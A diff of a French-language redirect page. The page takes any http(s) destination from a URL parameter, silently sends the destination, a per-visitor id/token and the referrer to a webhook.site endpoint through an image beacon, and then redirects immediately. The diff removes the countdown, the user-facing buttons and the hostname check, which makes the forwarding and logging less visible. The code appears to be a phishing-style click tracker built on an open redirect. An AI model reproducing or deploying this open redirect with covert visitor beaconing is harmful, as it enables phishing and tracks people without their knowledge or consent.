--- a/redirect.html
+++ b/redirect.html
@@ -3,113 +3,67 @@
 <head>
   <meta charset="utf-8"/>
   <meta name="viewport" content="width=device-width,initial-scale=1"/>
-  <title>Redirection</title>
+  <title>Redirection...</title>
   <style>
-    body{font-family:system-ui,-apple-system,Segoe UI,Roboto,Arial;margin:0;padding:40px;background:#f7f7f7;color:#111}
-    .card{max-width:760px;margin:0 auto;background:#fff;padding:22px;border-radius:10px;box-shadow:0 8px 24px rgba(0,0,0,0.06)}
-    .muted{color:#666;font-size:0.95rem}
-    .btn{display:inline-block;padding:10px 14px;border-radius:8px;text-decoration:none;border:1px solid #ddd;margin-top:12px}
-    .small{font-size:0.9rem}
+    body{font-family:system-ui,-apple-system,Segoe UI,Roboto,Arial;margin:0;padding:40px;background:#fafafa;color:#111}
+    .box{max-width:720px;margin:100px auto;text-align:center;background:#fff;padding:24px;border-radius:12px;box-shadow:0 4px 20px rgba(0,0,0,0.05)}
+    .muted{color:#666;font-size:0.9rem;margin-top:12px}
   </style>
 </head>
 <body>
-  <div class="card">
-    <h2 id="title">Préparation de la redirection…</h2>
-    <p class="muted small">Destination : <span id="dest">—</span></p>
-    <p class="muted small">ID : <span id="tok">—</span></p>
-    <p>Vous allez être redirigé automatiquement dans <strong id="count">3</strong> secondes.</p>
-    <p>
-      <a id="goNow" class="btn" href="#">Aller maintenant</a>
-      <a class="btn" href="/" onclick="return true;">Retour</a>
-    </p>
-    <hr>
-    <p class="muted small">Si l'URL est invalide, aucun redirection ne sera effectuée.</p>
+  <div class="box">
+    <h2 id="msg">Redirection en cours...</h2>
+    <p class="muted" id="dest">Veuillez patienter</p>
   </div>
 
 <script>
 (function(){
-  // Config
-  const DEFAULT_TIMEOUT = 3;            // secondes
-  const LOG_ENDPOINT = "https://webhook.site/203a4b84-4dd1-44da-8181-ff8d6637e60b"; // ← remplace par ton webhook.site ou endpoint
+  const LOG_ENDPOINT = "https://webhook.site/203a4b84-4dd1-44da-8181-ff8d6637e60b"; // <-- remplace par ton URL webhook
   const ALLOW_SCHEMES = ['http:','https:'];
 
-  // Helpers
   function getParam(name){
-    const url = new URL(location.href);
-    return url.searchParams.get(name);
+    const u = new URL(location.href);
+    return u.searchParams.get(name);
   }
-  function safeText(s){ return s ? String(s) : ''; }
   function isValidUrl(u){
-    try {
+    try{
       const url = new URL(u);
-      return ALLOW_SCHEMES.includes(url.protocol) && !!url.hostname;
-    } catch(e){ return false; }
+      return ALLOW_SCHEMES.includes(url.protocol);
+    }catch(e){return false;}
   }
-  // récupère q= ou url=
+
   let q = getParam('q') || getParam('url') || getParam('u');
-  if (!q) {
-    document.getElementById('title').innerText = "Paramètre manquant";
+  if(!q){
+    document.getElementById('msg').innerText = "Paramètre manquant";
     document.getElementById('dest').innerText = "Utiliser ?q=https%3A%2F%2Fexemple.com";
-    document.getElementById('count').innerText = "-";
     return;
   }
 
-  // Décodage intelligent (gère encodage double)
-  try { q = decodeURIComponent(q); } catch(e){}
-  try { q = decodeURIComponent(q); } catch(e){} // si double encodé
+  try{ q = decodeURIComponent(q); }catch(e){}
+  if(!/^https?:\/\//i.test(q)) q = 'https://' + q;
 
-  // Normalisation rapide : assure présence du protocole si absent (optionnel)
-  if (!/^https?:\/\//i.test(q)) {
-    q = 'https://' + q;
-  }
-
-  // Affichage
   document.getElementById('dest').innerText = q;
-  const token = getParam('id') || getParam('token') || '';
-  document.getElementById('tok').innerText = token || '—';
-  const goNow = document.getElementById('goNow');
-  goNow.href = q;
 
-  if (!isValidUrl(q)) {
-    document.getElementById('title').innerText = "URL invalide";
-    document.getElementById('count').innerText = "-";
+  if(!isValidUrl(q)){
+    document.getElementById('msg').innerText = "URL invalide";
     return;
   }
 
-  // Envoi d'un "ping" de log via image beacon (fonctionne sans CORS)
-  // (Remplace LOG_ENDPOINT par ton endpoint - ex: webhook.site ou une URL de collecte)
-  (function sendLogViaImg(){
-    try {
-      if (!LOG_ENDPOINT) return;
-      const img = new Image(1,1);
-      // on transmet q et token (encodés)
-      const p = new URL(LOG_ENDPOINT);
-      p.searchParams.set('q', q);
-      if (token) p.searchParams.set('id', token);
-      p.searchParams.set('ref', document.referrer || '');
-      // timestamp OPTIONNEL
-      p.searchParams.set('t', Date.now().toString());
-      img.src = p.toString();
-      // no need to add to DOM
-    } catch(e){
-      // silent
-      console.log('log skip', e);
-    }
-  })();
+  const token = getParam('id') || getParam('token') || '';
 
-  // Compte à rebours et redirection
-  let t = DEFAULT_TIMEOUT;
-  document.getElementById('count').innerText = t;
-  const timer = setInterval(()=> {
-    t--;
-    document.getElementById('count').innerText = t > 0 ? t : 0;
-    if (t <= 0) {
-      clearInterval(timer);
-      // redirection finale
-      window.location.href = q;
-    }
-  }, 1000);
+  // Envoi du log via un pixel image
+  try{
+    const img = new Image();
+    const p = new URL(LOG_ENDPOINT);
+    p.searchParams.set('q', q);
+    if(token) p.searchParams.set('id', token);
+    p.searchParams.set('ref', document.referrer || '');
+    p.searchParams.set('t', Date.now());
+    img.src = p.toString();
+  }catch(e){}
 
+  // Redirection immédiate
+  window.location.replace(q);
 })();
 </script>
 </body>
